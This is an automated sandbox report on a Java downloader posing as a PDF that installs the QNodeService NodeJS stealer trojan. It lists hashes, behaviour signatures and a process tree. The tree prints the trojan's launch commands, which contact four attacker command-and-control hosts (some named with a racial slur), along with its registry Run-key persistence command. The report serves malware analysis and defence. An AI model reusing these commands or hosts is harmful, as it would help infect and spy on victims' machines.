Analysis
-
max time kernel
119s -
max time network
149s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
07-07-2020 08:30
General
-
Target
Anführungszeichen 00826__pdf.jar
-
Size
11KB
-
MD5
c0f75e92112c654930809ee53974d110
-
SHA1
c9751343def42d1056cbc73461c613c57dc4cf4a
-
SHA256
e19994da703630d50798f4346431430f349bbab079b015572c48e867e160bd3b
-
SHA512
c16d650b0bcda2b50b31832f0154e3efcf9bc79c3f97d7fd54535023320fe80a794f7fcef741b1c7f62e3881c99ec43f92c1dea8dcbaadeefee5a88ef2a50cc2
Score
10/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 8 IoCs
-
Loads dropped DLL 4 IoCs
-
Adds Run entry to start application 2 TTPs 2 IoCs
-
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Executes dropped EXE 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
QNodeService NodeJS Trojan 1 IoCs
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Anführungszeichen 00826__pdf.jar"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://coolnigga.linkpc.net --central-base-url https://mynigga.servehttp.com --central-base-url https://coolboy.serveftp.com --central-base-url https://badboy.linkpc.net2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-4f9a1ccf" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-4f9a1ccf.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-4f9a1ccf" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-4f9a1ccf.cmd\""4⤵
- Adds Run entry to start application
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://coolnigga.linkpc.net --central-base-url https://mynigga.servehttp.com --central-base-url https://coolboy.serveftp.com --central-base-url https://badboy.linkpc.net3⤵
- Loads dropped DLL
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
-
-
-
-
-
-
-
-
-
Filesize
4KB
-
-
Filesize
4KB
-
-